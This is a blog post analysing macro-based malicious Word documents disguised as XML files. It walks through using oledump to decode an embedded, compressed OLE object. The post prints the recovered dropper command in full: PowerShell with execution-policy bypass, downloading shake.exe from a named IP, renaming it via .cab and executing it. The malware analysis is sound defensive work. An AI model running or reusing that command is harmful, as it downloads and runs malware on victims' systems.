Thursday, April 2, 2015

Evolution of the macro enabled document (XML files and oledump-ception)

Looks like the miscreants have changed their tactics slightly, yet again.

I hope you're all familiar with the macro enabled document. If not, I analyzed one here: http://arvandor2.blogspot.com/2015/02/malware-analysis.html

They pretty much all followed the same typical pattern, almost to a T, for several months. Then they made a slight modification. At first it kind of mystified me, since while it made my job of analysis slightly more difficult, it should have made it more obvious even to the less technical of users that it was bad.

It made the analysis more difficult since it showed up as a straight XML file, not an OpenXML or any kind of Office doctype, so my automated tools (at the time,) wouldn't strip out the macros, and forced me to rely more on dynamic analysis. I'll discuss how that got fixed later...

So at first, all they did was change the file to an XML, with the macro embedded, and set <?mso-application progid="Word.Document"?> to make it launch word. Then it would show the "enable content" button as per usual, so on and so forth. You could easily see that it was macro enabled, however...


Then, a few weeks later we see this little oddity... No macro enabled, but there's an embedded object.



Interesting... So when we open this critter, we see this



Really? A .xls icon inside of a Word Document? That SHOULD be suspicious even to the more clueless click-happy users.

I was able to decode the base64 embedded in the XML file, but it just looked like junk to me... however...

The wonderfully awesome Didier Stevens at http://blog.didierstevens.com/ has built this insanely powerful OLE file analyzer in python, called oledump. I shared the sample with him, and he was able to determine that the junk from the base64 decoded stream was actually ZLIB encoded data (which he gathered by the x78 hex value near the beginning of the hexdump.) Once decoded, this proved to be yet another OLE object, which turned out to be the VBA code that is run when you double click on the icon.

Stevens then updated his oledump tool to handle this file. His tool is very slick in that you can pipe its output out to other commands, and it can also handle output piped into it. He did a little video on analyzing this XML sample here: https://www.youtube.com/watch?v=uaua4NogEyk

To sum it up, however, he works his way up to this neat little one line incantation to strip out the relevant IOC from the VBA code.

oledump -s A1 --decompress -d 078409755.doc | oledump -s 3 -e | pcregrep -o '".+"' | head -n 1 | tr -d '"' | base64 -d

Quick summary of the above command: You run oledump on the malicious .doc (XML) file, and it shows a single stream, A1. So you get info on, and eventually add the new --decompress switch to decompress the stream. You add the -d switch to dump it raw, and then pipe that into your second instance of oledump. Now it shows four streams, one of which is labeled Ole10Native. Hmmm, an ole object, eh? So you get info on it with the -i switch and it mentions some .vbs files. A vbs script, neat.

Swap out the -i switch for the -e switch and it dumps out the VB code just as if it were a normal macro enabled document. This code contains a base64 encoded string that looks like Base64Decode("codedtext"). The pcregrep command cuts out everything found between a pair of quotes, the head -n 1 takes the first line, since that's the only thing we're interested in, tr -d '"' deletes the quotes from the string, and base64 -d decodes it to regular text which finally reveals what the macro is trying to do.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

Launch powershell, download a file from that ip called shake.exe, store it as that .cab file, then expand it to an .exe and run it. The .cab to .exe bypasses a certain protection, but what I can't remember off-hand. I'll look it up later ;)



No comments:

Post a Comment